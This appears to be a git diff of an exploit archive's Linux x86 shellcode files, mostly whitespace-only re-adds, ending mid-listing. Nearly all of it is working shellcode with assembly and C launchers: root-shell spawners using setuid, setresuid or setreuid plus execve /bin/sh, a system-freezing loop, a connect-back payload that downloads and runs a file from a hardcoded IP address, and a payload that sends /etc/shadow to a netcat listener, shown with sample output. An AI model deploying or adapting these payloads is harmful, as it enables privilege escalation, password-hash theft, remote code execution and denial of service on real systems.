-"\x66\x58" // pop eax -"\x66\x89\xE1" // mov ecx,esp -"\x6A\x39" // push byte +0x39 ; at most 57 bytes -"\x66\x5A" // pop edx -"\xCD\x80" // int 0x80 -"\x3C\x38" // cmp al,0x38 ; if only 56 bytes -"\x74\x06" // jz 0x40 ; there is no packet -"\x6A\x01" // push byte +0x1 ; capture. Proceed -"\x66\x58" // pop eax ; with shellcode -"\xCD\x80" // int 0x80 ; else, exit() -/* -Append your shellcode here -*/ -"\x90"; - -main(){(*(void (*)()) sc)();} ------BEGIN PGP SIGNATURE----- - -iEYEARECAAYFAkkjGO0ACgkQ2LnNaOYR/B1h1QCg2uatkfAzSE5Jgc3bzJmFU/3s -opMAoLufSxvFoSNl3W+6h5rxmLIcq2Mp -=ISTU ------END PGP SIGNATURE----- - +/* + ▐▄∙ ▄ ▄▄▄ . ▐ ▄ ∙ ▌ ▄ ·. ▄∙ ▄▌ ▄▄▄▄▄ ▄▄▄· + █▌█▌■ ▀▄.▀· ∙█▌▐█ ■ ·██ ▐███■ █■██▌ ∙██ ▐█ ▀█ + ·██· ▐▀▀■▄ ▐█▐▐▌ ▄█▀▄ ▐█ ▌▐▌▐█· █▌▐█▌ ▐█.■ ▄█▀▀█ + ■▐█·█▌ ▐█▄▄▌ ██▐█▌ ▐█▌.▐▌ ██ ██▌▐█▌ ▐█▄█▌ ▐█▌· ▐█ ■▐▌ + ∙▀▀ ▀▀ ▀▀▀ ▀▀ █■ ▀█▄▀■ ▀▀ █■▀▀▀ ▀▀▀ ▀▀▀ ▀ ▀ + +Ho' Detector (Promiscuous mode detector shellcode) +by XenoMuta +http://xenomuta.tuxfamily.org/ + +This shellcode uses a stupid, yet effective method +for detecting sniffing on all interfaces in linux: +parsing /proc/net/packet, which contains libpcap's +stats and only one line (56 bytes) when not sniffing. +*/ + +char sc[]= +"\x66\x31\xC0" // xor eax,eax +"\x66\x50" // push eax +"\x66\x68\x63\x6B\x65\x74" // push dword 0x74656b63 ; cket +"\x66\x68\x74\x2F\x70\x61" // push dword 0x61702f74 ; t/pa +"\x66\x68\x63\x2F\x6E\x65" // push dword 0x656e2f63 ; c/ne +"\x66\x68\x2F\x70\x72\x6F" // push dword 0x6f72702f ; /pro +"\xB0\x05" // mov al,0x5 ; open() +"\x66\x89\xE3" // mov ebx,esp ; /proc/net/packet +"\x66\x31\xC9" // xor ecx,ecx ; O_RDONLY +"\xCD\x80" // int 0x80 +"\x66\x93" // xchg eax,ebx +"\x6A\x03" // push byte +0x3 ; read() +"\x66\x58" // pop eax +"\x66\x89\xE1" // mov ecx,esp +"\x6A\x39" // push byte +0x39 ; at most 57 bytes +"\x66\x5A" // pop edx +"\xCD\x80" // int 0x80 +"\x3C\x38" // cmp al,0x38 ; if only 56 bytes +"\x74\x06" // jz 0x40 ; there is no packet +"\x6A\x01" // push byte +0x1 ; capture. Proceed +"\x66\x58" // pop eax ; with shellcode +"\xCD\x80" // int 0x80 ; else, exit() +/* +Append your shellcode here +*/ +"\x90"; + +main(){(*(void (*)()) sc)();} +-----BEGIN PGP SIGNATURE----- + +iEYEARECAAYFAkkjGO0ACgkQ2LnNaOYR/B1h1QCg2uatkfAzSE5Jgc3bzJmFU/3s +opMAoLufSxvFoSNl3W+6h5rxmLIcq2Mp +=ISTU +-----END PGP SIGNATURE----- + // milw0rm.com [2008-11-18] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13333.txt b/platforms/lin_x86/shellcode/13333.txt index 6adb01b3e..f2692960a 100755 --- a/platforms/lin_x86/shellcode/13333.txt +++ b/platforms/lin_x86/shellcode/13333.txt @@ -1,57 +1,57 @@ --------------------[ASM]---------------------- - -global _start -section .text -_start: -;setuid(0) -xor ebx,ebx -lea eax,[ebx+17h] -cdq -int 80h -;execve("/bin/sh",0,0) -xor ecx,ecx -push ecx -push 0x68732f6e -push 0x69622f2f -lea eax,[ecx+0Bh] -mov ebx,esp -int 80h - --------------------[/ASM]---------------------- - --------------------[C]---------------------- - -#include - -const char shellcode[]= "\x31\xdb" - "\x8d\x43\x17" - "\x99" - "\xcd\x80" - "\x31\xc9" - "\x51" - "\x68\x6e\x2f\x73\x68" - "\x68\x2f\x2f\x62\x69" - "\x8d\x41\x0b" - "\x89\xe3" - "\xcd\x80"; - -int main() -{ - printf ("\nSMALLEST SETUID & EXECVE GNU/LINUX x86 STABLE SHELLCODE" - "WITHOUT NULLS THAT SPAWNS A SHELL" - "\n\nCoded by Chema Garcia (aka sch3m4)" - "\n\t + sch3m4@opensec.es" - "\n\t + http://opensec.es" - "\n\n[+] Date: 29/11/2008" - "\n[+] Thanks to: vlan7" - "\n\n[+] Shellcode Size: %d bytes\n\n", - sizeof(shellcode)-1); - - (*(void (*)()) shellcode)(); - - return 0; -} - --------------------[C]---------------------- - +-------------------[ASM]---------------------- + +global _start +section .text +_start: +;setuid(0) +xor ebx,ebx +lea eax,[ebx+17h] +cdq +int 80h +;execve("/bin/sh",0,0) +xor ecx,ecx +push ecx +push 0x68732f6e +push 0x69622f2f +lea eax,[ecx+0Bh] +mov ebx,esp +int 80h + +-------------------[/ASM]---------------------- + +-------------------[C]---------------------- + +#include + +const char shellcode[]= "\x31\xdb" + "\x8d\x43\x17" + "\x99" + "\xcd\x80" + "\x31\xc9" + "\x51" + "\x68\x6e\x2f\x73\x68" + "\x68\x2f\x2f\x62\x69" + "\x8d\x41\x0b" + "\x89\xe3" + "\xcd\x80"; + +int main() +{ + printf ("\nSMALLEST SETUID & EXECVE GNU/LINUX x86 STABLE SHELLCODE" + "WITHOUT NULLS THAT SPAWNS A SHELL" + "\n\nCoded by Chema Garcia (aka sch3m4)" + "\n\t + sch3m4@opensec.es" + "\n\t + http://opensec.es" + "\n\n[+] Date: 29/11/2008" + "\n[+] Thanks to: vlan7" + "\n\n[+] Shellcode Size: %d bytes\n\n", + sizeof(shellcode)-1); + + (*(void (*)()) shellcode)(); + + return 0; +} + +-------------------[C]---------------------- + # milw0rm.com [2008-11-13] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13334.txt b/platforms/lin_x86/shellcode/13334.txt index 3affd2a39..17ae4de67 100755 --- a/platforms/lin_x86/shellcode/13334.txt +++ b/platforms/lin_x86/shellcode/13334.txt @@ -1,54 +1,54 @@ -{==========================================================} -{ linux x86 setresuid(0,0,0)-/bin/sh shellcode 35 bytes } -{==========================================================} - -Shellcode by the FHM crew: ----------------------------- -http://fhm.noblogs.org ----------------------------- - -Contact us at: - --------------------------------------------------- -sorrow: rawhazard@autistici.org; betat@hotmail.it --------------------------------------------------- -fhm: fhm@autistici.org; --------------------------------------------------- - - -Assembly code: - ---[code]-- -BITS 32 - -;setresuid(0,0,0) -xor eax, eax -xor ebx, ebx -xor ecx, ecx -cdq -mov BYTE al, 0xa4 -int 0x80 - -;execve("/bin//sh", ["/bin//sh", NULL], [NULL]) -push BYTE 11 -pop eax -push ecx -push 0x68732f2f -push 0x6e69622f -mov ebx, esp -push ecx -mov edx, esp -push ebx -mov ecx, esp -int 0x80 ---[/code]-- - -Shellcode string: ---[code]-- -char shellcode [] = -"\x80\xcd\xe1\x89\x53\xe2\x89\x51\xe3\x89\x6e\x69\x62\x2f\x68\x68\x73\x2f\x2f - -\x68\x51\x58\x0b\x6a\x80\xcd\xa4\xb0\x99\xc9\x31\xdb\x31\xc0\x31" --[/code]- - +{==========================================================} +{ linux x86 setresuid(0,0,0)-/bin/sh shellcode 35 bytes } +{==========================================================} + +Shellcode by the FHM crew: +---------------------------- +http://fhm.noblogs.org +---------------------------- + +Contact us at: + +-------------------------------------------------- +sorrow: rawhazard@autistici.org; betat@hotmail.it +-------------------------------------------------- +fhm: fhm@autistici.org; +-------------------------------------------------- + + +Assembly code: + +--[code]-- +BITS 32 + +;setresuid(0,0,0) +xor eax, eax +xor ebx, ebx +xor ecx, ecx +cdq +mov BYTE al, 0xa4 +int 0x80 + +;execve("/bin//sh", ["/bin//sh", NULL], [NULL]) +push BYTE 11 +pop eax +push ecx +push 0x68732f2f +push 0x6e69622f +mov ebx, esp +push ecx +mov edx, esp +push ebx +mov ecx, esp +int 0x80 +--[/code]-- + +Shellcode string: +--[code]-- +char shellcode [] = +"\x80\xcd\xe1\x89\x53\xe2\x89\x51\xe3\x89\x6e\x69\x62\x2f\x68\x68\x73\x2f\x2f + +\x68\x51\x58\x0b\x6a\x80\xcd\xa4\xb0\x99\xc9\x31\xdb\x31\xc0\x31" +-[/code]- + # milw0rm.com [2008-09-29] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13335.c b/platforms/lin_x86/shellcode/13335.c index 97669deaa..d46609705 100755 --- a/platforms/lin_x86/shellcode/13335.c +++ b/platforms/lin_x86/shellcode/13335.c @@ -1,43 +1,43 @@ -/* - :::::::-. ... ::::::. :::. - ;;, `';, ;; ;;;`;;;;, `;;; - `[[ [[[[' [[[ [[[[[. '[[ - $$, $$$$ $$$ $$$ "Y$c$$ - 888_,o8P'88 .d888 888 Y88 - MMMMP"` "YmmMMMM"" MMM YM - - [ dun[at]strcpy.pl ] - - [ linux/x86 iopl(3); asm("cli"); while(1){} 12 bytes ] - - ############################################################### - iopl(3); asm("cli"); while(1){} - // * this code cause freezeing system - ################################################################# - - __asm__( - "xorl %eax, %eax\n" - "pushl $0x3\n" - "popl %ebx\n" - "movb $0x6e,%al\n" - "int $0x80\n" - "cli\n" - "x1:\n" - "jmp x1\n" - ); - -*/ - - -char shellcode[]="\x31\xc0\x6a\x03\x5b\xb0\x6e\xcd\x80\xfa\xeb\xfe"; - -int main() { - - void (*sc)(); - sc = (void *)&shellcode; - sc(); - -return 0; -} - +/* + :::::::-. ... ::::::. :::. + ;;, `';, ;; ;;;`;;;;, `;;; + `[[ [[[[' [[[ [[[[[. '[[ + $$, $$$$ $$$ $$$ "Y$c$$ + 888_,o8P'88 .d888 888 Y88 + MMMMP"` "YmmMMMM"" MMM YM + + [ dun[at]strcpy.pl ] + + [ linux/x86 iopl(3); asm("cli"); while(1){} 12 bytes ] + + ############################################################### + iopl(3); asm("cli"); while(1){} + // * this code cause freezeing system + ################################################################# + + __asm__( + "xorl %eax, %eax\n" + "pushl $0x3\n" + "popl %ebx\n" + "movb $0x6e,%al\n" + "int $0x80\n" + "cli\n" + "x1:\n" + "jmp x1\n" + ); + +*/ + + +char shellcode[]="\x31\xc0\x6a\x03\x5b\xb0\x6e\xcd\x80\xfa\xeb\xfe"; + +int main() { + + void (*sc)(); + sc = (void *)&shellcode; + sc(); + +return 0; +} + // milw0rm.com [2008-09-17] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13336.c b/platforms/lin_x86/shellcode/13336.c index 6c5d1bb2a..5c55ffdad 100755 --- a/platforms/lin_x86/shellcode/13336.c +++ b/platforms/lin_x86/shellcode/13336.c @@ -1,40 +1,40 @@ -/* -By Thomas Rinsma (16 apr. 2008) - -Shellcode makes system speaker beep once, 45 bytes: - - - ; int fd = open("/dev/tty10", O_RDONLY); - push byte 5 - pop eax - cdq - push edx - push 0x30317974 - push 0x742f2f2f - push 0x7665642f - mov ebx, esp - mov ecx, edx - int 80h - - ; ioctl(fd, KDMKTONE (19248), 66729180); - mov ebx, eax - push byte 54 - pop eax - mov ecx, 4294948047 - not ecx - mov edx, 66729180 - int 80h -*/ - - -main() -{ - char shellcode[] = - "\x6a\x05\x58\x99\x52\x68\x74\x79\x31\x30\x68\x2f\x2f\x2f\x74" - "\x68\x2f\x64\x65\x76\x89\xe3\x89\xd1\xcd\x80\x89\xc3\x6a\x36" - "\x58\xb9\xcf\xb4\xff\xff\xf7\xd1\xba\xdc\x34\xfa\x03\xcd\x80"; - - (*(void (*)()) shellcode)(); -} - +/* +By Thomas Rinsma (16 apr. 2008) + +Shellcode makes system speaker beep once, 45 bytes: + + + ; int fd = open("/dev/tty10", O_RDONLY); + push byte 5 + pop eax + cdq + push edx + push 0x30317974 + push 0x742f2f2f + push 0x7665642f + mov ebx, esp + mov ecx, edx + int 80h + + ; ioctl(fd, KDMKTONE (19248), 66729180); + mov ebx, eax + push byte 54 + pop eax + mov ecx, 4294948047 + not ecx + mov edx, 66729180 + int 80h +*/ + + +main() +{ + char shellcode[] = + "\x6a\x05\x58\x99\x52\x68\x74\x79\x31\x30\x68\x2f\x2f\x2f\x74" + "\x68\x2f\x64\x65\x76\x89\xe3\x89\xd1\xcd\x80\x89\xc3\x6a\x36" + "\x58\xb9\xcf\xb4\xff\xff\xf7\xd1\xba\xdc\x34\xfa\x03\xcd\x80"; + + (*(void (*)()) shellcode)(); +} + // milw0rm.com [2008-09-09] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13337.c b/platforms/lin_x86/shellcode/13337.c index 099e9e2ba..ed7e3b399 100755 --- a/platforms/lin_x86/shellcode/13337.c +++ b/platforms/lin_x86/shellcode/13337.c @@ -1,136 +1,136 @@ -/* -;file download shellcode (149 bytes) -; -;connect back, download a file and execute. -;modify the name of the file and the ip address first. -; -;militan -;Advanced Defense Lab(ADL) -; - - - -global _start - -_start: - -xor ecx,ecx -mul ecx -xor ebx,ebx -cdq - -;socket -push eax -push byte 0x1 -push byte 0x2 -mov ecx,esp -inc ebx -mov al,0x66 -int 0x80 -mov edi,eax ;edi=sockfd - - -;connect,port(9999)=270f ip(140.115.53.35)=(8c.73.35.23) -push edx -push long 0x2335738c ;address * -push word 0x0f27 ;port * -mov dl,0x02 -push dx ;family 1 -mov ecx,esp ;adjust struct -push byte 0x10 -push ecx -push edi ;sockfd -mov ecx,esp -mov bl,3 -mov al,102 -int 0x80 - -;sys_open(cb,O_WRONLY|O_CREATE|O_TRUNC[0001.0100.1000=1101],700) -xor ebx,ebx -xor ecx,ecx -push ecx -push word 0x6263 ;file name="cb" -mov ebx,esp -mov cx,0x242 -mov dx,0x1c0 ;Octal -mov al,5 -int 0x80 -mov esi,eax ;esi=fd - - -; -xor ecx,ecx -mul ecx -cdq -mov dx,0x03e8 ;memory chunk=1000=0x03e8: read per time - -L1: -;sys_read(socket sockfd,buf,len) -xor ebx,ebx -xor eax,eax -mov al,3 -mov ebx,edi ;edi=sock fd -lea ecx,[esp-1000] ;memory chunk -int 0x80 -;sys_write(fd,*buf,count) -mov ebx,esi -mov edx,eax -xor eax,eax -mov al,4 -int 0x80 -cmp dx,0x03e8 -je L1 ;loop - - -CONTINUE: -;sys_close(fd) -mov ebx,esi -xor eax,eax -mov al,6 -int 0x80 - -;execve[./cb,0] -xor ecx,ecx -mul ecx -push ecx -push word 0x6263 ;file name="cb" -mov ebx,esp -push ecx -push ebx -mov ecx,esp -mov al,0x0b -int 0x80 - - -EXIT: -xor eax,eax -xor ebx,ebx -inc eax -int 0x80 -*/ - -#include -#include -#include - - -unsigned char shellcode[]="\x31\xc9\xf7\xe1\x31\xdb\x99\x50\x6a\x01\x6a\x02\x89\xe1\x43\xb0\x66\xcd\x80" -"\x89\xc7\x52\x68\x8c\x73\x35\x23\x66\x68\x27\x0f\xb2\x02\x66\x52\x89\xe1\x6a\x10\x51\x57\x89\xe1\xb3\x03\xb0\x66\xcd\x80" -"\x31\xdb\x31\xc9\x51\x66\x68\x63\x62\x89\xe3\x66\xb9\x42\x02\x66\xba\xc0\x01\xb0\x05\xcd\x80" - -"\x89\xc6\x31\xc9\xf7\xe1\x99\x66\xba\xe8\x03\x31\xdb\x31\xc0\xb0\x03\x89\xfb\x8d\x8c\x24\x18\xfc\xff\xff\xcd\x80\x89\xf3\x89\xc2\x31\xc0\xb0\x04\xcd\x80" -"\x66\x81\xfa\xe8\x03\x74\xde\x89\xf3\x31\xc0\xb0\x06\xcd\x80\x31\xc9\xf7\xe1\x51\x66\x68\x63\x62\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80" -"\x31\xc0\x31\xdb\x40\xcd\x80"; - -void k(){ - int *ret; - ret=(int *)&ret+2; - (*ret)=(int)shellcode; -} - -int main (){ - k(); - return 0; -} - +/* +;file download shellcode (149 bytes) +; +;connect back, download a file and execute. +;modify the name of the file and the ip address first. +; +;militan +;Advanced Defense Lab(ADL) +; + + + +global _start + +_start: + +xor ecx,ecx +mul ecx +xor ebx,ebx +cdq + +;socket +push eax +push byte 0x1 +push byte 0x2 +mov ecx,esp +inc ebx +mov al,0x66 +int 0x80 +mov edi,eax ;edi=sockfd + + +;connect,port(9999)=270f ip(140.115.53.35)=(8c.73.35.23) +push edx +push long 0x2335738c ;address * +push word 0x0f27 ;port * +mov dl,0x02 +push dx ;family 1 +mov ecx,esp ;adjust struct +push byte 0x10 +push ecx +push edi ;sockfd +mov ecx,esp +mov bl,3 +mov al,102 +int 0x80 + +;sys_open(cb,O_WRONLY|O_CREATE|O_TRUNC[0001.0100.1000=1101],700) +xor ebx,ebx +xor ecx,ecx +push ecx +push word 0x6263 ;file name="cb" +mov ebx,esp +mov cx,0x242 +mov dx,0x1c0 ;Octal +mov al,5 +int 0x80 +mov esi,eax ;esi=fd + + +; +xor ecx,ecx +mul ecx +cdq +mov dx,0x03e8 ;memory chunk=1000=0x03e8: read per time + +L1: +;sys_read(socket sockfd,buf,len) +xor ebx,ebx +xor eax,eax +mov al,3 +mov ebx,edi ;edi=sock fd +lea ecx,[esp-1000] ;memory chunk +int 0x80 +;sys_write(fd,*buf,count) +mov ebx,esi +mov edx,eax +xor eax,eax +mov al,4 +int 0x80 +cmp dx,0x03e8 +je L1 ;loop + + +CONTINUE: +;sys_close(fd) +mov ebx,esi +xor eax,eax +mov al,6 +int 0x80 + +;execve[./cb,0] +xor ecx,ecx +mul ecx +push ecx +push word 0x6263 ;file name="cb" +mov ebx,esp +push ecx +push ebx +mov ecx,esp +mov al,0x0b +int 0x80 + + +EXIT: +xor eax,eax +xor ebx,ebx +inc eax +int 0x80 +*/ + +#include +#include +#include + + +unsigned char shellcode[]="\x31\xc9\xf7\xe1\x31\xdb\x99\x50\x6a\x01\x6a\x02\x89\xe1\x43\xb0\x66\xcd\x80" +"\x89\xc7\x52\x68\x8c\x73\x35\x23\x66\x68\x27\x0f\xb2\x02\x66\x52\x89\xe1\x6a\x10\x51\x57\x89\xe1\xb3\x03\xb0\x66\xcd\x80" +"\x31\xdb\x31\xc9\x51\x66\x68\x63\x62\x89\xe3\x66\xb9\x42\x02\x66\xba\xc0\x01\xb0\x05\xcd\x80" + +"\x89\xc6\x31\xc9\xf7\xe1\x99\x66\xba\xe8\x03\x31\xdb\x31\xc0\xb0\x03\x89\xfb\x8d\x8c\x24\x18\xfc\xff\xff\xcd\x80\x89\xf3\x89\xc2\x31\xc0\xb0\x04\xcd\x80" +"\x66\x81\xfa\xe8\x03\x74\xde\x89\xf3\x31\xc0\xb0\x06\xcd\x80\x31\xc9\xf7\xe1\x51\x66\x68\x63\x62\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80" +"\x31\xc0\x31\xdb\x40\xcd\x80"; + +void k(){ + int *ret; + ret=(int *)&ret+2; + (*ret)=(int)shellcode; +} + +int main (){ + k(); + return 0; +} + // milw0rm.com [2008-08-25] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13338.c b/platforms/lin_x86/shellcode/13338.c index 0097e676c..de8331fcf 100755 --- a/platforms/lin_x86/shellcode/13338.c +++ b/platforms/lin_x86/shellcode/13338.c @@ -1,44 +1,44 @@ -/* - -setreuid(geteuid, geteuid) + execve(/bin/sh) shellcode - useful for wargames and the like. - -global _start - -section .text -_start: - ; geteuid - push byte 49 - pop eax - int 0x80 - - ; setreuid - mov ebx, eax - mov ecx, eax - push byte 70 - pop eax - int 0x80 - - ; execve - xor eax,eax - push eax - push 0x68732f2f - push 0x6e69622f - push esp - pop ebx - push eax - push ebx - mov ecx, esp - xor edx, edx - mov byte al,11 - int 0x80 -*/ - -main() { - char shellcode[] = "\x6a\x31\x58\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\x31\xc0\x50" - "\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\x53\x89\xe1\x31" - "\xd2\xb0\x0b\xcd\x80"; - - (*(void (*)()) shellcode)(); -} - +/* + +setreuid(geteuid, geteuid) + execve(/bin/sh) shellcode - useful for wargames and the like. + +global _start + +section .text +_start: + ; geteuid + push byte 49 + pop eax + int 0x80 + + ; setreuid + mov ebx, eax + mov ecx, eax + push byte 70 + pop eax + int 0x80 + + ; execve + xor eax,eax + push eax + push 0x68732f2f + push 0x6e69622f + push esp + pop ebx + push eax + push ebx + mov ecx, esp + xor edx, edx + mov byte al,11 + int 0x80 +*/ + +main() { + char shellcode[] = "\x6a\x31\x58\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\x31\xc0\x50" + "\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\x53\x89\xe1\x31" + "\xd2\xb0\x0b\xcd\x80"; + + (*(void (*)()) shellcode)(); +} + // milw0rm.com [2008-08-19] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13339.asm b/platforms/lin_x86/shellcode/13339.asm index d2b48bed6..4d928ca48 100755 --- a/platforms/lin_x86/shellcode/13339.asm +++ b/platforms/lin_x86/shellcode/13339.asm @@ -1,193 +1,193 @@ -; (C)oDed by 0in -; Dark-Coders Group Productions -; [Linux x86 connect back&send&exit /etc/shadow 155 byte shellcode] -; >>>>>>>>>>>>>>>>>>>> www.dark-coders.pl <<<<<<<<<<<<<<<<<<<<<< -; Contact: 0in[dot]email[at]gmail[dot]com -; Greetings to:die_Angel,suN8Hclf,m4r1usz,cOndemned -; Compile: -; nasm -f elf shellcode.asm -; ld -o shellcode shellcode.o -; How it works!? -; (1st console) [root@13world]# ./shellcode -; (2nd console) 0in[~]%> nc -v -l -p 8192 -; (2nd console) -;Connection from 127.0.0.1:48820 -;root:[password here]:13896:::::: -;bin:x:0:::::: -;daemon:x:0:::::: -;mail:x:0:::::: -;ftp:x:0:::::: -;nobody:x:0:::::: -;dbus:!:13716:0:99999:7::: -;zer0in:[password here]:13716:0:99999:7::: -;avahi:!:13716:0:99999:7::: -;hal:!:13716:0:99999:7::: -;clamav:!:13735:0:99999:7::: -;fetchmail:!:13737:0:99999:7::: -;mysql:!:12072:0:99999:7::: -;postfix:!:13798:0:99999:7::: -;mpd:!:13828:0:99999:7::: -;nginx:!:13959:0:99999:7::: -;tomcat:!:14063:0:99999:7::: -;http:!:14075:0:99999:7::: -;snort:!:14075:0:99999:7::: - -;The code (Assembler version): - -Section .text - global _start - -_start: - ;open(file,O_RDONLY): - xor ebx,ebx - push byte 0x77 ;/etc/shadow - push word 0x6f64 - push 0x6168732f - push 0x6374652f; ---------- - mov ebx,esp ; first arg - filename - xor ax,ax - inc ax - inc ax - inc ax - inc ax - inc ax ; ax = 5 (O_RDONLY) - int 0x80 - mov ebx,eax - ;read(file,buff,1222): - xor ax,ax - inc ax - inc ax - inc ax ; syscall id = 3 - mov dx,1222 ; size to read - push esp - mov ecx,[esp] ; memory - int 0x80 - mov esi,eax ; file to ESI - ;socket(PF_INET,SOCK_STREAM,IPPROTO_IP) - xor ebx,ebx - push ebx ;0 ; 3rd arg - inc ebx - push ebx ;1 ; 2nd arg - inc ebx - push ebx ;2 ; 1st arg - ;socketcall() - mov ax,1666 ;-------------- - sub ax,1564 ;-------------- - xor bx,bx ; socket() call id - inc bx ;- - - - - - - - - - mov ecx,esp ; socket() - int 0x80 ; do it! - pop ebx; clear mem - ;connect(eax,struct server,16) - ;16 - sizeof struct sockaddr - mov edx, eax - xor ebx,ebx - xor ebx,ebx ; ebx = 0 - IP=0.0.0.0 (set EBX to ur IP) - push ebx - mov bx,1666 ; definition of struct sockaddr - sub bx,1634 ;we cant stay 0x00 here (8192 PORT) - push bx - mov al, 2 ; - push ax - mov ecx, esp - mov al, 16 - push eax - push ecx - push edx - mov al, 102 - mov bx,1666 - sub bx,1663 ;--------------------------------- - mov ecx, esp - int 0x80 ; call connect - mov ebx,eax ; socket to ebx - ; Ok! so... - ; Lets write file to server and go down! - ;write(socket,file,1222) - pop ebx - mov ax,1666 - sub ax,1662 - push esi - mov dx,16666 - sub dx,15444 - int 0x80 - ;exit(1) : - xor eax,eax ;---------- - inc eax - mov ebx,eax ;---------- - int 0x80 ; do it! -;C: -; #include -; char shellcode[]="\x31\xdb" -; "\x6a\x77" -; "\x66\x68\x64\x6f" -; "\x68\x2f\x73\x68\x61" -; "\x68\x2f\x65\x74\x63" -; "\x89\xe3" -; "\x66\x31\xc0" -; "\x66\x40" -; "\x66\x40" -; "\x66\x40" -; "\x66\x40" -; "\x66\x40" -; "\xcd\x80" -; "\x89\xc3" -; "\x66\x31\xc0" -; "\x66\x40" -; "\x66\x40" -; "\x66\x40" -; "\x66\xba\xc6\x04" -; "\x54" -; "\x8b\x0c\x24" -; "\xcd\x80" -; "\x89\xc6" -; "\x31\xdb" -; "\x53" -; "\x43" -; "\x53" -; "\x43" -; "\x53" -; "\x66\xb8\x82\x06" -; "\x66\x2d\x1c\x06" -; "\x66\x31\xdb" -; "\x66\x43" -; "\x89\xe1" -; "\xcd\x80" -; "\x5b" -; "\x89\xc2" -; "\x31\xdb" -; "\x53" -; "\x66\xbb\x82\x06" -; "\x66\x81\xeb\x62\x06" -; "\x66\x53" -; "\xb0\x02" -; "\x66\x50" -; "\x89\xe1" -; "\xb0\x10" -; "\x50" -; "\x51" -; "\x52" -; "\xb0\x66" -; "\x66\xbb\x82\x06" -; "\x66\x81\xeb\x7f\x06" -; "\x89\xe1" -; "\xcd\x80" -; "\x89\xc3" -; "\x5b" -; "\x66\xb8\x82\x06" -; "\x66\x2d\x7e\x06" -; "\x56" -; "\x66\xba\x1a\x41" -; "\x66\x81\xea\x54\x3c" -; "\xcd\x80" -; "\x31\xc0" -; "\x40" -; "\x89\xc3" -; "\xcd\x80"; -; int main(int argc, char **argv) -; { -; int *ret; -; ret = (int *)&ret + 2; -; (*ret) = (int) shellcode; -; } - +; (C)oDed by 0in +; Dark-Coders Group Productions +; [Linux x86 connect back&send&exit /etc/shadow 155 byte shellcode] +; >>>>>>>>>>>>>>>>>>>> www.dark-coders.pl <<<<<<<<<<<<<<<<<<<<<< +; Contact: 0in[dot]email[at]gmail[dot]com +; Greetings to:die_Angel,suN8Hclf,m4r1usz,cOndemned +; Compile: +; nasm -f elf shellcode.asm +; ld -o shellcode shellcode.o +; How it works!? +; (1st console) [root@13world]# ./shellcode +; (2nd console) 0in[~]%> nc -v -l -p 8192 +; (2nd console) +;Connection from 127.0.0.1:48820 +;root:[password here]:13896:::::: +;bin:x:0:::::: +;daemon:x:0:::::: +;mail:x:0:::::: +;ftp:x:0:::::: +;nobody:x:0:::::: +;dbus:!:13716:0:99999:7::: +;zer0in:[password here]:13716:0:99999:7::: +;avahi:!:13716:0:99999:7::: +;hal:!:13716:0:99999:7::: +;clamav:!:13735:0:99999:7::: +;fetchmail:!:13737:0:99999:7::: +;mysql:!:12072:0:99999:7::: +;postfix:!:13798:0:99999:7::: +;mpd:!:13828:0:99999:7::: +;nginx:!:13959:0:99999:7::: +;tomcat:!:14063:0:99999:7::: +;http:!:14075:0:99999:7::: +;snort:!:14075:0:99999:7::: + +;The code (Assembler version): + +Section .text + global _start + +_start: + ;open(file,O_RDONLY): + xor ebx,ebx + push byte 0x77 ;/etc/shadow + push word 0x6f64 + push 0x6168732f + push 0x6374652f; ---------- + mov ebx,esp ; first arg - filename + xor ax,ax + inc ax + inc ax + inc ax + inc ax + inc ax ; ax = 5 (O_RDONLY) + int 0x80 + mov ebx,eax + ;read(file,buff,1222): + xor ax,ax + inc ax + inc ax + inc ax ; syscall id = 3 + mov dx,1222 ; size to read + push esp + mov ecx,[esp] ; memory + int 0x80 + mov esi,eax ; file to ESI + ;socket(PF_INET,SOCK_STREAM,IPPROTO_IP) + xor ebx,ebx + push ebx ;0 ; 3rd arg + inc ebx + push ebx ;1 ; 2nd arg + inc ebx + push ebx ;2 ; 1st arg + ;socketcall() + mov ax,1666 ;-------------- + sub ax,1564 ;-------------- + xor bx,bx ; socket() call id + inc bx ;- - - - - - - - - + mov ecx,esp ; socket() + int 0x80 ; do it! + pop ebx; clear mem + ;connect(eax,struct server,16) + ;16 - sizeof struct sockaddr + mov edx, eax + xor ebx,ebx + xor ebx,ebx ; ebx = 0 - IP=0.0.0.0 (set EBX to ur IP) + push ebx + mov bx,1666 ; definition of struct sockaddr + sub bx,1634 ;we cant stay 0x00 here (8192 PORT) + push bx + mov al, 2 ; + push ax + mov ecx, esp + mov al, 16 + push eax + push ecx + push edx + mov al, 102 + mov bx,1666 + sub bx,1663 ;--------------------------------- + mov ecx, esp + int 0x80 ; call connect + mov ebx,eax ; socket to ebx + ; Ok! so... + ; Lets write file to server and go down! + ;write(socket,file,1222) + pop ebx + mov ax,1666 + sub ax,1662 + push esi + mov dx,16666 + sub dx,15444 + int 0x80 + ;exit(1) : + xor eax,eax ;---------- + inc eax + mov ebx,eax ;---------- + int 0x80 ; do it! +;C: +; #include +; char shellcode[]="\x31\xdb" +; "\x6a\x77" +; "\x66\x68\x64\x6f" +; "\x68\x2f\x73\x68\x61" +; "\x68\x2f\x65\x74\x63" +; "\x89\xe3" +; "\x66\x31\xc0" +; "\x66\x40" +; "\x66\x40" +; "\x66\x40" +; "\x66\x40" +; "\x66\x40" +; "\xcd\x80" +; "\x89\xc3" +; "\x66\x31\xc0" +; "\x66\x40" +; "\x66\x40" +; "\x66\x40" +; "\x66\xba\xc6\x04" +; "\x54" +; "\x8b\x0c\x24" +; "\xcd\x80" +; "\x89\xc6" +; "\x31\xdb" +; "\x53" +; "\x43" +; "\x53" +; "\x43" +; "\x53" +; "\x66\xb8\x82\x06" +; "\x66\x2d\x1c\x06" +; "\x66\x31\xdb" +; "\x66\x43" +; 